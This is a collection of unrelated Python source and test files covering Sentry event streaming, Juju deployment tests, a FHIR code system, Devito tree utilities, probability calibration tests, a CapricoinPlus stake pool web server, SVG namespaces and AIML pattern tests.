manager = EventManager(raw_event)
manager.normalize()
event = manager.save(self.project.id)
# verify eventstream was called by EventManager
insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
assert not insert_args
assert insert_kwargs == {
'event': event,
'group': event.group,
'is_new_group_environment': True,
'is_new': True,
'is_regression': False,
'is_sample': False,
'primary_hash': 'acbd18db4cc2f85cedef654fccc4a4d8',
'skip_consume': False
}
# pass arguments on to Kafka EventManager
self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
assert not produce_args
assert produce_kwargs['topic'] == 'events'
assert produce_kwargs['key'] == six.text_type(self.project.id)
version, type_, primary_payload = json.loads(produce_kwargs['value'])[:3]
assert version == 2
assert type_ == 'insert'
# insert what would have been the Kafka payload directly
# into Snuba, expect an HTTP 200 and for the event to now exist
snuba.insert_raw([primary_payload])
assert _get_event_count() == 1
|
py | 1a4fcaabd027ce853f027cd50be2a3575dda21bd | import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'mysql',
application_name='mysql',
series='trusty',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
|
py | 1a4fcb64cd737f409ed175b2fc3a210d726956b4 | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["StructureDefinitionKind"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class StructureDefinitionKind:
"""
StructureDefinitionKind
Defines the type of structure that a definition is describing.
Status: active - Version: 4.0.1
Copyright None
http://hl7.org/fhir/structure-definition-kind
"""
primitive_type = CodeSystemConcept(
{
"code": "primitive-type",
"definition": "A primitive type that has a value and an extension. These can be used throughout complex datatype, Resource and extension definitions. Only the base specification can define primitive types.",
"display": "Primitive Data Type",
}
)
"""
Primitive Data Type
A primitive type that has a value and an extension. These can be used throughout complex datatype, Resource and extension definitions. Only the base specification can define primitive types.
"""
complex_type = CodeSystemConcept(
{
"code": "complex-type",
"definition": "A complex structure that defines a set of data elements that is suitable for use in 'resources'. The base specification defines a number of complex types, and other specifications can define additional types. These factory do not have a maintained identity.",
"display": "Complex Data Type",
}
)
"""
Complex Data Type
A complex structure that defines a set of data elements that is suitable for use in 'resources'. The base specification defines a number of complex types, and other specifications can define additional types. These factory do not have a maintained identity.
"""
resource = CodeSystemConcept(
{
"code": "resource",
"definition": "A 'resource' - a directed acyclic graph of elements that aggregrates other types into an identifiable entity. The base FHIR resources are defined by the FHIR specification itself but other 'resources' can be defined in additional specifications (though these will not be recognised as 'resources' by the FHIR specification (i.e. they do not get end-points etc, or act as the targets of references in FHIR defined resources - though other specificatiosn can treat them this way).",
"display": "Resource",
}
)
"""
Resource
A 'resource' - a directed acyclic graph of elements that aggregrates other types into an identifiable entity. The base FHIR resources are defined by the FHIR specification itself but other 'resources' can be defined in additional specifications (though these will not be recognised as 'resources' by the FHIR specification (i.e. they do not get end-points etc, or act as the targets of references in FHIR defined resources - though other specificatiosn can treat them this way).
"""
logical = CodeSystemConcept(
{
"code": "logical",
"definition": "A pattern or a template that is not intended to be a real resource or complex type.",
"display": "Logical",
}
)
"""
Logical
A pattern or a template that is not intended to be a real resource or complex type.
"""
class Meta:
resource = _resource
|
py | 1a4fcbb7e294b22c807f08d8f721626d9fa3a8c8 | from devito.ir.iet import Iteration, List, IterationTree, FindSections, FindSymbols
from devito.symbolics import Macro
from devito.tools import flatten
from devito.types import Array, LocalObject
__all__ = ['filter_iterations', 'retrieve_iteration_tree',
'compose_nodes', 'derive_parameters']
def retrieve_iteration_tree(node, mode='normal'):
"""Return a list of all :class:`Iteration` sub-trees rooted in ``node``.
For example, given the Iteration tree:
.. code-block:: c
Iteration i
expr0
Iteration j
Iteraion k
expr1
Iteration p
expr2
Return the list: ::
[(Iteration i, Iteration j, Iteration k), (Iteration i, Iteration p)]
:param node: The searched Iteration/Expression tree.
:param mode: Accepted values are 'normal' (default) and 'superset', in which
case iteration trees that are subset of larger iteration trees
are dropped.
"""
assert mode in ('normal', 'superset')
trees = [IterationTree(i) for i in FindSections().visit(node) if i]
if mode == 'normal':
return trees
else:
match = []
for i in trees:
if any(set(i).issubset(set(j)) for j in trees if i != j):
continue
match.append(i)
return IterationTree(match)
def filter_iterations(tree, key=lambda i: i, stop=lambda: False):
"""
Given an iterable of :class:`Iteration` objects, return a new list
containing all items such that ``key(o)`` is True.
This function accepts an optional argument ``stop``. This may be either a
lambda function, specifying a stop criterium, or any of the following
special keywords: ::
* 'any': Return as soon as ``key(o)`` is False and at least one
item has been collected.
* 'asap': Return as soon as at least one item has been collected and
all items for which ``key(o)`` is False have been encountered.
It is useful to specify a ``stop`` criterium when one is searching the
first Iteration in an Iteration/Expression tree for which a given property
does not hold.
"""
assert callable(stop) or stop in ['any', 'asap']
tree = list(tree)
filtered = []
off = []
if stop == 'any':
stop = lambda: len(filtered) > 0
elif stop == 'asap':
hits = [i for i in tree if not key(i)]
stop = lambda: len(filtered) > 0 and len(off) == len(hits)
for i in tree:
if key(i):
filtered.append(i)
else:
off.append(i)
if stop():
break
return filtered
def compose_nodes(nodes, retrieve=False):
"""
Build an Iteration/Expression tree by nesting the nodes in ``nodes``.
"""
l = list(nodes)
tree = []
if not isinstance(l[0], Iteration):
# Nothing to compose
body = flatten(l)
body = List(body=body) if len(body) > 1 else body[0]
else:
body = l.pop(-1)
while l:
handle = l.pop(-1)
body = handle._rebuild(body, **handle.args_frozen)
tree.append(body)
if retrieve is True:
tree = list(reversed(tree))
return body, tree
else:
return body
def derive_parameters(nodes, drop_locals=False):
"""
Derive all input parameters (function call arguments) from an IET
by collecting all symbols not defined in the tree itself.
"""
# Pick all free symbols and symbolic functions from the kernel
functions = FindSymbols('symbolics').visit(nodes)
free_symbols = FindSymbols('free-symbols').visit(nodes)
# Filter out function base symbols and use real function objects
function_names = [s.name for s in functions]
symbols = [s for s in free_symbols if s.name not in function_names]
symbols = functions + symbols
defines = [s.name for s in FindSymbols('defines').visit(nodes)]
parameters = tuple(s for s in symbols if s.name not in defines)
# Drop globally-visible objects
parameters = [p for p in parameters if not isinstance(p, Macro)]
# Filter out locally-allocated Arrays and Objects
if drop_locals:
parameters = [p for p in parameters
if not (isinstance(p, Array) and (p._mem_heap or p._mem_stack))]
parameters = [p for p in parameters if not isinstance(p, LocalObject)]
return parameters
|
py | 1a4fcbc1ca49a31fca3b892c0ae5d1d9f4db2017 | def more_even_or_odd(integers):
ans = ""
even = 0
odd = 0
for i in integers:
if i % 2 == 0:
even += 1
else:
odd += 1
if even > odd:
ans += "Even"
elif even < odd:
ans += "Odd"
else:
ans += "Equal"
return ans |
py | 1a4fcd0268b6fa446c7a82deebff76cdefdcbd1e | # Standard imports
import pytest
import numpy as np
# Package imports
import pycalib.calibration_methods as calm
# General
@pytest.fixture(scope='module')
def sample_size():
return 1000
@pytest.fixture(scope='module')
def p_dist_beta(sample_size, a=1, b=4):
# Predicted probabilities (transformed to [0.5, 1])
return np.hstack([np.random.beta(a=a, b=b, size=sample_size)]) * 0.5 + 0.5
@pytest.fixture(scope='module')
def y_cal_binary(sample_size, prob_class_0=.66):
# Sample ground truth
return np.random.choice(a=[0, 1], size=sample_size, replace=True, p=[prob_class_0, 1 - prob_class_0])
@pytest.fixture(scope='module')
def p_cal_binary(sample_size, y_cal_binary, p_dist_beta, a=3, b=.1, c=1):
# Uncalibrated probabilities through miscalibration function f
# f = lambda x: 1 / (1 + c * (1 - x) ** a / x ** b)
f = lambda x: 1 / (1 + np.exp(-a * x - b))
sampler_f = lambda w, y: np.random.choice(a=[1 - y, y], p=[1 - f(w), f(w)])
y_pred = np.array(list(map(sampler_f, p_dist_beta, y_cal_binary)))
# Compute probabilities for other classes
p_pred = np.zeros([sample_size, 2])
for i in range(0, 2):
# Set probabilities for correct predictions
correct_and_index_i = (y_pred == y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[correct_and_index_i]
p_pred[correct_and_index_i, i] = prob
p_pred[correct_and_index_i, 1 - i] = 1 - prob
# Set probabilities for incorrect predictions
false_and_index_i = (y_pred != y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[false_and_index_i]
p_pred[false_and_index_i, i] = 1 - prob
p_pred[false_and_index_i, 1 - i] = prob
return p_pred
# Temperature Scaling
def test_constant_accuracy(p_cal_binary, y_cal_binary):
# Compute accuracy
acc = np.mean(np.equal(np.argmax(p_cal_binary, axis=1), y_cal_binary))
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Test constant accuracy on calibration set
p_ts = ts.predict_proba(p_cal_binary)
acc_ts = np.mean(np.equal(np.argmax(p_ts, axis=1), y_cal_binary))
assert acc == acc_ts, "Accuracy of calibrated probabilities does not match accuracy of calibration set."
def test_temperature_positive(p_cal_binary, y_cal_binary):
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Positive temperature
assert ts.T > 0, "Temperature is not positive."
# Histogram Binning
@pytest.mark.parametrize("binning_mode", [
("equal_width"),
("equal_freq")
])
def test_hist_binning_bin_size(p_cal_binary, y_cal_binary, binning_mode):
n_bins = 2
hb = calm.HistogramBinning(mode=binning_mode, n_bins=n_bins)
hb.fit(p_cal_binary, y_cal_binary)
assert len(hb.binning) == n_bins + 1, "Number of bins does not match input."
# Bayesian Binning into Quantiles
def test_bin_with_size_zero():
# Data
p_cal = .5 * np.ones([100, 2])
y_cal = np.hstack([np.ones([50]), np.zeros([50])])
# Fit calibration model
bbq = calm.BayesianBinningQuantiles()
bbq.fit(X=p_cal, y=y_cal)
# Predict
p_pred = bbq.predict_proba(X=p_cal)
# Check for NaNs
assert not np.any(np.isnan(p_pred)), "Calibrated probabilities are NaN."
# GP calibration
def test_inference_mean_approximation(p_cal_binary, y_cal_binary):
# GP calibration
gpc = calm.GPCalibration(n_classes=2, logits=False, random_state=42)
gpc.fit(p_cal_binary, y_cal_binary)
# Inference: mean approximation
p_gpc = gpc.predict_proba(p_cal_binary, mean_approx=True)
# Check for NaNs in predictions
assert not np.any(np.isnan(p_gpc)), "Calibrated probabilities of the mean approximation are NaN."
# OneVsAll calibration
def test_output_size_missing_classes():
# Generate random training data with n_classes > n_calibration
np.random.seed(1)
n_classes = 200
n_calibration = 100
X_cal = np.random.uniform(0, 1, [n_calibration, n_classes])
X_cal /= np.sum(X_cal, axis=1)[:, np.newaxis]
y_cal = np.random.choice(range(n_classes), n_calibration)
# Arbitrary Choice of binary calibration method
platt = calm.PlattScaling()
platt.fit(X_cal, y_cal)
# Test output size
assert np.shape(platt.predict_proba(X_cal))[
1] == n_classes, "Predicted probabilities do not match number of classes."
|
py | 1a4fcdaa3e46e1c673492603aa1246f37cf81f28 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Copyright (c) 2020 The Capricoin+ Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import json
import hashlib
import threading
import decimal
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer
from .util import (
COIN,
makeInt,
format8,
format16,
)
class HttpHandler(BaseHTTPRequestHandler):
def page_error(self, error_str):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Error</title></head>' \
+ '<body>' \
+ '<p>Error: ' + error_str + '</p>' \
+ '<p><a href=\'/\'>home</a></p>' \
+ '</body></html>'
return bytes(content, 'UTF-8')
def js_error(self, error_str):
error_str_json = json.dumps({'error': error_str})
return bytes(error_str_json, 'UTF-8')
def js_address(self, urlSplit):
if len(urlSplit) < 4:
raise ValueError('Must specify address')
address_str = urlSplit[3]
stakePool = self.server.stakePool
return bytes(json.dumps(stakePool.getAddressSummary(address_str)), 'UTF-8')
def js_metrics(self, urlSplit):
stakePool = self.server.stakePool
if len(urlSplit) > 3:
code_str = urlSplit[3]
hashed = hashlib.sha256(str(code_str + self.server.management_key_salt).encode('utf-8')).hexdigest()
if not hashed == self.server.management_key_hash:
raise ValueError('Unknown argument')
return bytes(json.dumps(stakePool.rebuildMetrics()), 'UTF-8')
return bytes(json.dumps(stakePool.getMetrics()), 'UTF-8')
def js_index(self, urlSplit):
return bytes(json.dumps(self.server.stakePool.getSummary()), 'UTF-8')
def page_config(self, urlSplit):
settings_path = os.path.join(self.server.stakePool.dataDir, 'stakepool.json')
if not os.path.exists(settings_path):
return self.page_error('Settings file not found.')
with open(settings_path) as fs:
settings = json.load(fs)
settings['capricoinplusbindir'] = '...'
settings['capricoinplusdatadir'] = '...'
settings['poolownerwithdrawal'] = '...'
settings.pop('management_key_salt', None)
settings.pop('management_key_hash', None)
return bytes(json.dumps(settings, indent=4), 'UTF-8')
def page_address(self, urlSplit):
if len(urlSplit) < 3:
return self.page_error('Must specify address')
address_str = urlSplit[2]
stakePool = self.server.stakePool
try:
summary = stakePool.getAddressSummary(address_str)
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Address </title></head>' \
+ '<body>' \
+ '<h2>Spend Address ' + address_str + '</h2>' \
+ '<h4>Pool Address ' + stakePool.poolAddr + '</h4>'
if 'accumulated' in summary:
content += '<table>' \
+ '<tr><td>Accumulated:</td><td>' + format16(summary['accumulated']) + '</td></tr>' \
+ '<tr><td>Payout Pending:</td><td>' + format8(summary['rewardpending']) + '</td></tr>' \
+ '<tr><td>Paid Out:</td><td>' + format8(summary['rewardpaidout']) + '</td></tr>' \
+ '<tr><td>Last Total Staking:</td><td>' + format8(summary['laststaking']) + '</td></tr>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
else:
content += '<table>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
content += '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_version(self):
try:
versions = self.server.stakePool.getVersions()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Pool Version: ' + versions['pool'] + '<br/>' \
+ 'Core Version: ' + versions['core'] + '<br/>' \
+ '</p>' \
+ '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_index(self):
stakePool = self.server.stakePool
try:
summary = stakePool.getSummary()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Mode: ' + summary['poolmode'] + '<br/>' \
+ 'Pool Address: ' + stakePool.poolAddr + '<br/>' \
+ 'Pool Fee: ' + str(stakePool.poolFeePercent) + '%<br/>' \
+ 'Stake Bonus: ' + str(stakePool.stakeBonusPercent) + '%<br/>' \
+ 'Payout Threshold: ' + format8(stakePool.payoutThreshold) + '<br/>' \
+ 'Blocks Between Payment Runs: ' + str(stakePool.minBlocksBetweenPayments) + '<br/>' \
+ 'Minimum output value: ' + format8(stakePool.minOutputValue) + '<br/>'
if stakePool.smsg_fee_rate_target is not None:
content += 'SMSG fee rate target: ' + format8(makeInt(stakePool.smsg_fee_rate_target)) + '<br/>'
content += '</p><p>' \
+ 'Synced Height: ' + str(summary['poolheight']) + '<br/>' \
+ 'Blocks Found: ' + str(summary['blocksfound']) + '<br/>' \
+ 'Total Disbursed: ' + format8(summary['totaldisbursed']) + '<br/>' \
+ 'Last Payment Run: ' + str(summary['lastpaymentrunheight']) + '<br/>' \
+ '<br/>' \
+ 'Total Pool Rewards: ' + format8(summary['poolrewardtotal']) + '<br/>' \
+ 'Total Pool Fees: ' + format8(summary['poolfeestotal']) + '<br/>' \
+ 'Total Pool Rewards Withdrawn: ' + format8(summary['poolwithdrawntotal']) + '<br/>' \
+ '<br/>' \
+ 'Total Pooled Coin: ' + format8(int(decimal.Decimal(summary['watchonlytotalbalance']) * COIN)) + '<br/>' \
+ 'Currently Staking: ' + format8(summary['stakeweight']) + '<br/>' \
+ '</p>'
content += '<br/><h3>Recent Blocks</h3><table><tr><th>Height</th><th>Block Hash</th><th>Block Reward</th><th>Total Coin Staking</th></tr>'
for b in summary['lastblocks']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td><td>' + format8(b[3]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Pending Payments</h3><table><tr><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['pendingpayments']:
content += '<tr><td>' + b[0] + '</td><td>' + format8(b[1]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Last Payments</h3><table><tr><th>Height</th><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['lastpayments']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td></tr>'
content += '</table>'
content += '</body></html>'
return bytes(content, 'UTF-8')
"""
def page_help(self):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<h3>Help</h3>' \
+ '<p>' \
+ '</p></body></html>'
return bytes(content, 'UTF-8')
"""
def putHeaders(self, status_code, content_type):
self.send_response(status_code)
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', content_type)
self.end_headers()
def handle_http(self, status_code, path):
urlSplit = self.path.split('/')
if len(urlSplit) > 1:
if urlSplit[1] == 'address':
self.putHeaders(status_code, 'text/html')
return self.page_address(urlSplit)
if urlSplit[1] == 'version':
self.putHeaders(status_code, 'text/html')
return self.page_version()
if urlSplit[1] == 'config':
self.putHeaders(status_code, 'text/plain')
return self.page_config(urlSplit)
if urlSplit[1] == 'json':
self.putHeaders(status_code, 'text/plain')
try:
if len(urlSplit) > 2:
if urlSplit[2] == 'version':
return bytes(json.dumps(self.server.stakePool.getVersions()), 'UTF-8')
if urlSplit[2] == 'address':
return self.js_address(urlSplit)
if urlSplit[2] == 'metrics':
return self.js_metrics(urlSplit)
return self.js_index(urlSplit)
except Exception as e:
return self.js_error(str(e))
self.putHeaders(status_code, 'text/html')
return self.page_index()
def do_GET(self):
response = self.handle_http(200, self.path)
self.wfile.write(response)
def do_HEAD(self):
self.putHeaders(200, 'text/html')
def do_OPTIONS(self):
self.send_response(200, 'ok')
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Headers', '*')
self.end_headers()
class HttpThread(threading.Thread, HTTPServer):
def __init__(self, fp, hostName, portNo, allow_cors, stakePool, key_salt=None, key_hash=None):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
self.fp = fp
self.hostName = hostName
self.portNo = portNo
self.allow_cors = allow_cors
self.stakePool = stakePool
self.management_key_salt = 'ajf8923ol2xcv.' if key_salt is None else key_salt
self.management_key_hash = 'fd5816650227b75143e60c61b19e113f43f5dcb57e2aa5b6161a50973f2033df' if key_hash is None else key_hash
self.timeout = 60
HTTPServer.__init__(self, (self.hostName, self.portNo), HttpHandler)
def stop(self):
self.stop_event.set()
# Send fake request
conn = http.client.HTTPConnection(self.hostName, self.portNo)
conn.connect()
conn.request("GET", "/none")
response = conn.getresponse()
data = response.read()
conn.close()
def stopped(self):
return self.stop_event.is_set()
def serve_forever(self):
while not self.stopped():
self.handle_request()
self.socket.close()
def run(self):
self.serve_forever()
|
py | 1a4fce8ca73064afba7deda533ecd1b95e4ae86b | from xml.etree.ElementTree import register_namespace
namespaces = {
'': 'http://www.w3.org/2000/svg',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'svg': 'http://www.w3.org/2000/svg',
'freecad': 'http://www.freecadweb.org/wiki/index.php?title=Svg_Namespace',
'xml': 'http://www.w3.org/XML/1998/namespace'
}
def namespaced(name, namespace_prefix=''):
return f'{{{namespaces[namespace_prefix]}}}{name}'
def namespaced_attrib(name, namespace_prefix=''):
if namespace_prefix == '':
return name
return namespaced(name, namespace_prefix)
def register_namespaces():
for prefix, url in namespaces.items():
register_namespace(prefix, url) |
py | 1a4fcf2471eaac8095b62ec5661f078752a0fd33 | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import os
from programytest.client import TestClient
class PatternSetTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_storage(self):
super(PatternSetTestClient, self).load_storage()
self.add_default_stores()
self.add_categories_store([os.path.dirname(__file__)])
self.add_sets_store([os.path.dirname(__file__) + os.sep + "sets"])
class PatternSetAIMLTests(unittest.TestCase):
def setUp(self):
client = PatternSetTestClient()
self._client_context = client.create_client_context("testid")
self._client_context.brain.dynamics.add_dynamic_set('number', "programy.dynamic.sets.numeric.IsNumeric", None)
def test_patten_set_match(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS AMBER")
self.assertEqual(response, "Amber IS A NICE COLOR.")
def test_patten_match_multi_word_set(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS AIR FORCE BLUE")
self.assertEqual(response, "Air Force blue IS A NICE COLOR.")
def test_patten_match_multi_word_set_latina(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS CAFÉ AU LAIT")
self.assertEqual(response, "Café au lait IS A NICE COLOR.")
def test_patten_match_mixed_word_set(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS RED")
self.assertEqual(response, "Red IS A NICE COLOR.")
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS RED ORANGE")
self.assertEqual(response, "Red Orange IS A NICE COLOR.")
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS SACRAMENTO STATE GREEN")
self.assertEqual(response, "Sacramento State green IS A NICE COLOR.")
def test_patten_match_mixed_word_set_longer_sentence(self):
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE RED VERY MUCH")
self.assertEqual(response, "IT IS OK, Red IS NOT MY BEST COLOUR EITHER.")
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE RED ORANGE AT ALL")
self.assertEqual(response, "IT IS OK, Red Orange IS NOT MY BEST COLOUR EITHER.")
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE SACRAMENTO STATE GREEN AT ALL")
self.assertEqual(response, "IT IS OK, Sacramento State green IS NOT MY BEST COLOUR EITHER.")
def test_patten_match_mixed_word_set_at_front(self):
response = self._client_context.bot.ask_question(self._client_context, "RED IS A NICE COLOUR")
self.assertEqual(response, "YES Red IS A LOVELY COLOUR.")
response = self._client_context.bot.ask_question(self._client_context, "RED ORANGE IS A NICE COLOUR")
self.assertEqual(response, "YES Red Orange IS A LOVELY COLOUR.")
response = self._client_context.bot.ask_question(self._client_context, "SACRAMENTO STATE GREEN IS A NICE COLOUR")
self.assertEqual(response, "YES Sacramento State green IS A LOVELY COLOUR.")
def test_inbuilt_set_number(self):
response = self._client_context.bot.ask_question(self._client_context, "Is 666 a number")
self.assertEqual(response, "Yes 666 is a number.")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.